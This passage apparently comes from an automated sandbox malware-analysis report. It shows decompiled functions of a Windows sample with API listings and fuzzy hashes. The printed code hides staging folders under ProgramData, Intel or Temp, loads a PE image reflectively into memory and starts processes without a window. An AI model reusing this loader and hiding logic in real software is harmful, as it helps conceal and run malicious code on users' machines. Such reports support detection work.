                                                            				memset( &_v1242, 0, 0x81 << 2);
                                                            				asm("stosw");
                                                            				_v724 = _t83;
                                                            				memset( &_v722, 0, 0x81 << 2);
                                                            				asm("stosw");
                                                            				_push(0x31);
                                                            				_v204 = _t83;
                                                            				memset( &_v202, 0, 0 << 2);
                                                            				asm("stosw");
                                                            				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
                                                            				GetWindowsDirectoryW( &_v1244, 0x104);
                                                            				_v1240 = _v1240 & 0x00000000;
                                                            				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
                                                            				_t98 = _t94 + 0x30;
                                                            				if(GetFileAttributesW( &_v724) == 0xffffffff) {
                                                            					L3:
                                                            					swprintf( &_v724, L"%s\\Intel",  &_v1244);
                                                            					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
                                                            						L2:
                                                            						_t55 = 1;
                                                            						return _t55;
                                                            					} else {
                                                            						GetTempPathW(0x104,  &_v724);
                                                            						if(wcsrchr( &_v724, 0x5c) != 0) {
                                                            							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
                                                            						}
                                                            						_t65 = E00401AF6( &_v724,  &_v204, _a4);
                                                            						asm("sbb eax, eax");
                                                            						return  ~( ~_t65);
                                                            					}
                                                            				}
                                                            				_t72 = E00401AF6( &_v724,  &_v204, _a4);
                                                            				_t98 = _t98 + 0xc;
                                                            				if(_t72 == 0) {
                                                            					goto L3;
                                                            				}
                                                            				goto L2;
                                                            			}
















                                                            0x00401b68
                                                            0x00401b80
                                                            0x00401b87
                                                            0x00401b89
                                                            0x00401b95
                                                            0x00401b9c
                                                            0x00401b9e
                                                            0x00401ba0
                                                            0x00401bab
                                                            0x00401bb4
                                                            0x00401bb6
                                                            0x00401bca
                                                            0x00401bdd
                                                            0x00401be9
                                                            0x00401c04
                                                            0x00401c06
                                                            0x00401c19
                                                            0x00401c40
                                                            0x00401c53
                                                            0x00401c70
                                                            0x00401c38
                                                            0x00401c3a
                                                            0x00000000
                                                            0x00401c8f
                                                            0x00401c97
                                                            0x00401cb2
                                                            0x00401cbf
                                                            0x00401cc4
                                                            0x00401cd6
                                                            0x00401ce0
                                                            0x00000000
                                                            0x00401ce2
                                                            0x00401c70
                                                            0x00401c2c
                                                            0x00401c31
                                                            0x00401c36
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                                                            • swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00401C10
                                                            • swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
                                                            • wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
                                                            • wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD
                                                              • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                                                              • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                                                              • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                                                              • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
                                                            • String ID: %s\Intel$%s\ProgramData
                                                            • API String ID: 3806094219-198707228
                                                            • Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                                                            • Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
                                                            • Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                                                            • Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 64%
                                                            			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
                                                            				signed int _v8;
                                                            				intOrPtr _v40;
                                                            				char _v44;
                                                            				void* _t82;
                                                            				struct HINSTANCE__* _t83;
                                                            				intOrPtr* _t84;
                                                            				intOrPtr _t89;
                                                            				void* _t91;
                                                            				void* _t104;
                                                            				void _t107;
                                                            				intOrPtr _t116;
                                                            				intOrPtr _t124;
                                                            				signed int _t125;
                                                            				signed char _t126;
                                                            				intOrPtr _t127;
                                                            				signed int _t134;
                                                            				intOrPtr* _t145;
                                                            				signed int _t146;
                                                            				intOrPtr* _t151;
                                                            				intOrPtr _t152;
                                                            				short* _t153;
                                                            				signed int _t155;
                                                            				void* _t156;
                                                            				intOrPtr _t157;
                                                            				void* _t158;
                                                            				void* _t159;
                                                            				void* _t160;
                                                            
                                                            				_v8 = _v8 & 0x00000000;
                                                            				_t3 =  &_a8; // 0x40213f
                                                            				if(E00402457( *_t3, 0x40) == 0) {
                                                            					L37:
                                                            					return 0;
                                                            				}
                                                            				_t153 = _a4;
                                                            				if( *_t153 == 0x5a4d) {
                                                            					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
                                                            						goto L37;
                                                            					}
                                                            					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
                                                            					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
                                                            						goto L2;
                                                            					} else {
                                                            						_t9 = _t151 + 0x38; // 0x68004021
                                                            						_t126 =  *_t9;
                                                            						if((_t126 & 0x00000001) != 0) {
                                                            							goto L2;
                                                            						}
                                                            						_t12 = _t151 + 0x14; // 0x4080e415
                                                            						_t13 = _t151 + 6; // 0x4080e0
                                                            						_t146 =  *_t13 & 0x0000ffff;
                                                            						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
                                                            						if(_t146 <= 0) {
                                                            							L16:
                                                            							_t83 = GetModuleHandleA("kernel32.dll");
                                                            							if(_t83 == 0) {
                                                            								goto L37;
                                                            							}
                                                            							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
                                                            							_t159 = _t158 + 0xc;
                                                            							if(_t84 == 0) {
                                                            								goto L37;
                                                            							}
                                                            							 *_t84( &_v44);
                                                            							_t86 = _v40;
                                                            							_t23 = _t151 + 0x50; // 0xec8b55c3
                                                            							_t25 = _t86 - 1; // 0xec8b55c2
                                                            							_t27 = _t86 - 1; // -1
                                                            							_t134 =  !_t27;
                                                            							_t155 =  *_t23 + _t25 & _t134;
                                                            							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
                                                            								goto L2;
                                                            							}
                                                            							_t31 = _t151 + 0x34; // 0x85680040
                                                            							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
                                                            							_t127 = _t89;
                                                            							_t160 = _t159 + 0x14;
                                                            							if(_t127 != 0) {
                                                            								L21:
                                                            								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
                                                            								_t156 = _t91;
                                                            								if(_t156 != 0) {
                                                            									 *((intOrPtr*)(_t156 + 4)) = _t127;
                                                            									_t38 = _t151 + 0x16; // 0xc3004080
                                                            									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
                                                            									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
                                                            									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
                                                            									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
                                                            									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
                                                            									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
                                                            									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
                                                            									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
                                                            									_t54 = _t151 + 0x54; // 0x8328ec83
                                                            									if(E00402457(_a8,  *_t54) == 0) {
                                                            										L36:
                                                            										E004029CC(_t156);
                                                            										goto L37;
                                                            									}
                                                            									_t57 = _t151 + 0x54; // 0x8328ec83
                                                            									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
                                                            									_t59 = _t151 + 0x54; // 0x8328ec83
                                                            									_a32 = _t104;
                                                            									memcpy(_t104, _a4,  *_t59);
                                                            									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
                                                            									 *_t156 = _t107;
                                                            									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
                                                            									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
                                                            										goto L36;
                                                            									}
                                                            									_t68 = _t151 + 0x34; // 0x85680040
                                                            									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
                                                            									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
                                                            										_t152 = 1;
                                                            										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
                                                            									} else {
                                                            										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
                                                            										_t152 = 1;
                                                            									}
                                                            									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
                                                            										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
                                                            										if(_t116 == 0) {
                                                            											 *((intOrPtr*)(_t156 + 0x34)) = 0;
                                                            											L41:
                                                            											return _t156;
                                                            										}
                                                            										if( *(_t156 + 0x14) == 0) {
                                                            											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
                                                            											goto L41;
                                                            										}
                                                            										_push(0);
                                                            										_push(_t152);
                                                            										_push(_t127);
                                                            										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
                                                            											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
                                                            											goto L41;
                                                            										}
                                                            										SetLastError(0x45a);
                                                            									}
                                                            									goto L36;
                                                            								}
                                                            								_a16(_t127, _t91, 0x8000, _a32);
                                                            								L23:
                                                            								SetLastError(0xe);
                                                            								L3:
                                                            								goto L37;
                                                            							}
                                                            							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
                                                            							_t160 = _t160 + 0x14;
                                                            							if(_t127 == 0) {
                                                            								goto L23;
                                                            							}
                                                            							goto L21;
                                                            						}
                                                            						_t145 = _t82 + 0xc;
                                                            						do {
                                                            							_t157 =  *((intOrPtr*)(_t145 + 4));
                                                            							_t124 =  *_t145;
                                                            							if(_t157 != 0) {
                                                            								_t125 = _t124 + _t157;
                                                            							} else {
                                                            								_t125 = _t124 + _t126;
                                                            							}
                                                            							if(_t125 > _v8) {
                                                            								_v8 = _t125;
                                                            							}
                                                            							_t145 = _t145 + 0x28;
                                                            							_t146 = _t146 - 1;
                                                            						} while (_t146 != 0);
                                                            						goto L16;
                                                            					}
                                                            				}
                                                            				L2:
                                                            				SetLastError(0xc1);
                                                            				goto L3;
                                                            			}






























                                                            0x004021ef
                                                            0x004021f8
                                                            0x00402204
                                                            0x0040243d
                                                            0x00000000
                                                            0x0040243d
                                                            0x0040220a
                                                            0x00402212
                                                            0x00402239
                                                            0x00000000
                                                            0x00000000
                                                            0x00402242
                                                            0x0040224a
                                                            0x00000000
                                                            0x00402254
                                                            0x00402254
                                                            0x00402254
                                                            0x0040225a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040225c
                                                            0x00402260
                                                            0x00402260
                                                            0x00402266
                                                            0x0040226a
                                                            0x0040228c
                                                            0x00402291
                                                            0x00402299
                                                            0x00000000
                                                            0x00000000
                                                            0x004022a7
                                                            0x004022aa
                                                            0x004022af
                                                            0x00000000
                                                            0x00000000
                                                            0x004022b9
                                                            0x004022bb
                                                            0x004022be
                                                            0x004022c1
                                                            0x004022c8
                                                            0x004022cb
                                                            0x004022d1
                                                            0x004022d7
                                                            0x00000000
                                                            0x00000000
                                                            0x004022e8
                                                            0x004022eb
                                                            0x004022ee
                                                            0x004022f0
                                                            0x004022f5
                                                            0x0040230f
                                                            0x0040231a
                                                            0x00402320
                                                            0x00402324
                                                            0x0040233d
                                                            0x00402340
                                                            0x0040234a
                                                            0x00402350
                                                            0x00402356
                                                            0x0040235c
                                                            0x00402362
                                                            0x00402368
                                                            0x0040236e
                                                            0x00402374
                                                            0x00402377
                                                            0x00402386
                                                            0x00402436
                                                            0x00402437
                                                            0x00000000
                                                            0x0040243c
                                                            0x00402396
                                                            0x0040239a
                                                            0x0040239d
                                                            0x004023a0
                                                            0x004023a7
                                                            0x004023ba
                                                            0x004023bc
                                                            0x004023bf
                                                            0x004023cc
                                                            0x00000000
                                                            0x00000000
                                                            0x004023d3
                                                            0x004023d3
                                                            0x004023d6
                                                            0x004023eb
                                                            0x004023ec
                                                            0x004023d8
                                                            0x004023e0
                                                            0x004023e6
                                                            0x004023e6
                                                            0x004023f8
                                                            0x00402414
                                                            0x00402419
                                                            0x0040244d
                                                            0x00402450
                                                            0x00000000
                                                            0x00402450
                                                            0x0040241e
                                                            0x00402448
                                                            0x00000000
                                                            0x00402448
                                                            0x00402420
                                                            0x00402421
                                                            0x00402424
                                                            0x00402429
                                                            0x00402441
                                                            0x00000000
                                                            0x00402441
                                                            0x00402430
                                                            0x00402430
                                                            0x00000000
                                                            0x004023f8
                                                            0x00402330
                                                            0x00402336
                                                            0x00402219
                                                            0x00402219
                                                            0x00000000
                                                            0x00402219
                                                            0x00402306
                                                            0x00402308
                                                            0x0040230d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040230d
                                                            0x0040226c
                                                            0x0040226f
                                                            0x0040226f
                                                            0x00402272
                                                            0x00402276
                                                            0x0040227c
                                                            0x00402278
                                                            0x00402278
                                                            0x00402278
                                                            0x00402281
                                                            0x00402283
                                                            0x00402283
                                                            0x00402286
                                                            0x00402289
                                                            0x00402289
                                                            0x00000000
                                                            0x0040226f
                                                            0x0040224a
                                                            0x00402214
                                                            0x00402219
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463
                                                            • SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
                                                            • GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
                                                            • memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7
                                                              • Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5
                                                            • SetLastError.KERNEL32(0000045A), ref: 00402430
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
                                                            • String ID: ?!@$GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 1900561814-3657104962
                                                            • Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                                                            • Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
                                                            • Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                                                            • Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
                                                            				void* _t15;
                                                            				WCHAR* _t17;
                                                            
                                                            				CreateDirectoryW(_a4, 0);
                                                            				if(SetCurrentDirectoryW(_a4) == 0) {
                                                            					L2:
                                                            					return 0;
                                                            				}
                                                            				_t17 = _a8;
                                                            				CreateDirectoryW(_t17, 0);
                                                            				if(SetCurrentDirectoryW(_t17) != 0) {
                                                            					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
                                                            					if(_a12 != 0) {
                                                            						_push(_t17);
                                                            						swprintf(_a12, L"%s\\%s", _a4);
                                                            					}
                                                            					_t15 = 1;
                                                            					return _t15;
                                                            				}
                                                            				goto L2;
                                                            			}





                                                            0x00401b07
                                                            0x00401b16
                                                            0x00401b27
                                                            0x00000000
                                                            0x00401b27
                                                            0x00401b18
                                                            0x00401b1e
                                                            0x00401b25
                                                            0x00401b36
                                                            0x00401b40
                                                            0x00401b42
                                                            0x00401b4e
                                                            0x00401b54
                                                            0x00401b59
                                                            0x00000000
                                                            0x00401b59
                                                            0x00000000

                                                            APIs
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00401B2C
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
                                                            • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Directory$AttributesCreateCurrentFile$swprintf
                                                            • String ID: %s\%s
                                                            • API String ID: 1036847564-4073750446
                                                            • Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                                                            • Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
                                                            • Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                                                            • Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 81%
                                                            			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
                                                            				struct _PROCESS_INFORMATION _v20;
                                                            				struct _STARTUPINFOA _v88;
                                                            				signed int _t32;
                                                            				intOrPtr _t37;
                                                            
                                                            				_t32 = 0x10;
                                                            				_v88.cb = 0x44;
                                                            				memset( &(_v88.lpReserved), 0, _t32 << 2);
                                                            				_v20.hProcess = 0;
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				_t37 = 1;
                                                            				_v88.wShowWindow = 0;
                                                            				_v88.dwFlags = _t37;
                                                            				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
                                                            					return 0;
                                                            				}
                                                            				if(_a8 != 0) {
                                                            					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
                                                            						TerminateProcess(_v20.hProcess, 0xffffffff);
                                                            					}
                                                            					if(_a12 != 0) {
                                                            						GetExitCodeProcess(_v20.hProcess, _a12);
                                                            					}
                                                            				}
                                                            				CloseHandle(_v20);
                                                            				CloseHandle(_v20.hThread);
                                                            				return _t37;
                                                            			}







                                                            0x00401070
                                                            0x00401074
                                                            0x0040107d
                                                            0x00401082
                                                            0x00401085
                                                            0x00401086
                                                            0x00401087
                                                            0x0040108d
                                                            0x0040108e
                                                            0x004010a1
                                                            0x004010b0
                                                            0x00000000
                                                            0x004010f7
                                                            0x004010b5
                                                            0x004010c5
                                                            0x004010cc
                                                            0x004010cc
                                                            0x004010d5
                                                            0x004010dd
                                                            0x004010dd
                                                            0x004010d5
                                                            0x004010ec
                                                            0x004010f1
                                                            0x00000000

                                                            APIs
                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
                                                            • WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
                                                            • TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
                                                            • CloseHandle.KERNEL32(?), ref: 004010EC
                                                            • CloseHandle.KERNEL32(?), ref: 004010F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                                            • String ID: D
                                                            • API String ID: 786732093-2746444292
                                                            • Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                                                            • Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
                                                            • Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                                                            • Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 81%
                                                            			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                            				CHAR* _v8;
                                                            				intOrPtr* _v24;
                                                            				intOrPtr _v28;
                                                            				struct _STARTUPINFOA _v96;
                                                            				int _v100;
                                                            				char** _v104;
                                                            				int _v108;
                                                            				void _v112;
                                                            				char** _v116;
                                                            				intOrPtr* _v120;
                                                            				intOrPtr _v124;
                                                            				intOrPtr* _t23;
                                                            				intOrPtr* _t24;
                                                            				void* _t27;
                                                            				void _t29;
                                                            				intOrPtr _t36;
                                                            				signed int _t38;
                                                            				int _t40;
                                                            				intOrPtr* _t41;
                                                            				intOrPtr _t42;
                                                            				intOrPtr _t46;
                                                            				intOrPtr _t47;
                                                            				intOrPtr _t49;
                                                            				intOrPtr* _t55;
                                                            				intOrPtr _t58;
                                                            				intOrPtr _t61;
                                                            
                                                            				_push(0xffffffff);
                                                            				_push(0x40d488);
                                                            				_push(0x4076f4);
                                                            				_push( *[fs:0x0]);
                                                            				 *[fs:0x0] = _t58;
                                                            				_v28 = _t58 - 0x68;
                                                            				_v8 = 0;
                                                            				__set_app_type(2);
                                                            				 *0x40f94c =  *0x40f94c | 0xffffffff;
                                                            				 *0x40f950 =  *0x40f950 | 0xffffffff;
                                                            				_t23 = __p__fmode();
                                                            				_t46 =  *0x40f948; // 0x0
                                                            				 *_t23 = _t46;
                                                            				_t24 = __p__commode();
                                                            				_t47 =  *0x40f944; // 0x0
                                                            				 *_t24 = _t47;
                                                            				 *0x40f954 = _adjust_fdiv;
                                                            				_t27 = E0040793F( *_adjust_fdiv);
                                                            				_t61 =  *0x40f870; // 0x1
                                                            				if(_t61 == 0) {
                                                            					__setusermatherr(E0040793C);
                                                            				}
                                                            				E0040792A(_t27);
                                                            				_push(0x40e00c);
                                                            				_push(0x40e008);
                                                            				L00407924();
                                                            				_t29 =  *0x40f940; // 0x0
                                                            				_v112 = _t29;
                                                            				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
                                                            				_push(0x40e004);
                                                            				_push(0x40e000);
                                                            				L00407924();
                                                            				_t55 =  *_acmdln;
                                                            				_v120 = _t55;
                                                            				if( *_t55 != 0x22) {
                                                            					while(1) {
                                                            						__eflags =  *_t55 - 0x20;
                                                            						if(__eflags <= 0) {
                                                            							goto L7;
                                                            						}
                                                            						_t55 = _t55 + 1;
                                                            						_v120 = _t55;
                                                            					}
                                                            				} else {
                                                            					do {
                                                            						_t55 = _t55 + 1;
                                                            						_v120 = _t55;
                                                            						_t42 =  *_t55;
                                                            					} while (_t42 != 0 && _t42 != 0x22);
                                                            					if( *_t55 == 0x22) {
                                                            						L6:
                                                            						_t55 = _t55 + 1;
                                                            						_v120 = _t55;
                                                            					}
                                                            				}
                                                            				L7:
                                                            				_t36 =  *_t55;
                                                            				if(_t36 != 0 && _t36 <= 0x20) {
                                                            					goto L6;
                                                            				}
                                                            				_v96.dwFlags = 0;
                                                            				GetStartupInfoA( &_v96);
                                                            				_t69 = _v96.dwFlags & 0x00000001;
                                                            				if((_v96.dwFlags & 0x00000001) == 0) {
                                                            					_t38 = 0xa;
                                                            				} else {
                                                            					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                            				}
                                                            				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
                                                            				_v108 = _t40;
                                                            				exit(_t40);
                                                            				_t41 = _v24;
                                                            				_t49 =  *((intOrPtr*)( *_t41));
                                                            				_v124 = _t49;
                                                            				_push(_t41);
                                                            				_push(_t49);
                                                            				L0040791E();
                                                            				return _t41;
                                                            			}





























                                                            0x004077bd
                                                            0x004077bf
                                                            0x004077c4
                                                            0x004077cf
                                                            0x004077d0
                                                            0x004077dd
                                                            0x004077e2
                                                            0x004077e7
                                                            0x004077ee
                                                            0x004077f5
                                                            0x004077fc
                                                            0x00407802
                                                            0x00407808
                                                            0x0040780a
                                                            0x00407810
                                                            0x00407816
                                                            0x0040781f
                                                            0x00407824
                                                            0x00407829
                                                            0x0040782f
                                                            0x00407836
                                                            0x0040783c
                                                            0x0040783d
                                                            0x00407842
                                                            0x00407847
                                                            0x0040784c
                                                            0x00407851
                                                            0x00407856
                                                            0x0040786f
                                                            0x00407875
                                                            0x0040787a
                                                            0x0040787f
                                                            0x0040788c
                                                            0x0040788e
                                                            0x00407894
                                                            0x004078d0
                                                            0x004078d0
                                                            0x004078d3
                                                            0x00000000
                                                            0x00000000
                                                            0x004078d5
                                                            0x004078d6
                                                            0x004078d6
                                                            0x00407896
                                                            0x00407896
                                                            0x00407896
                                                            0x00407897
                                                            0x0040789a
                                                            0x0040789c
                                                            0x004078a7
                                                            0x004078a9
                                                            0x004078a9
                                                            0x004078aa
                                                            0x004078aa
                                                            0x004078a7
                                                            0x004078ad
                                                            0x004078ad
                                                            0x004078b1
                                                            0x00000000
                                                            0x00000000
                                                            0x004078b7
                                                            0x004078be
                                                            0x004078c4
                                                            0x004078c8
                                                            0x004078dd
                                                            0x004078ca
                                                            0x004078ca
                                                            0x004078ca
                                                            0x004078e9
                                                            0x004078ee
                                                            0x004078f2
                                                            0x004078f8
                                                            0x004078fd
                                                            0x004078ff
                                                            0x00407902
                                                            0x00407903
                                                            0x00407904
                                                            0x0040790b

                                                            APIs
                                                            • __set_app_type.MSVCRT(00000002), ref: 004077E7
                                                            • __p__fmode.MSVCRT ref: 004077FC
                                                            • __p__commode.MSVCRT ref: 0040780A
                                                            • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                                                            • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                                                            • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
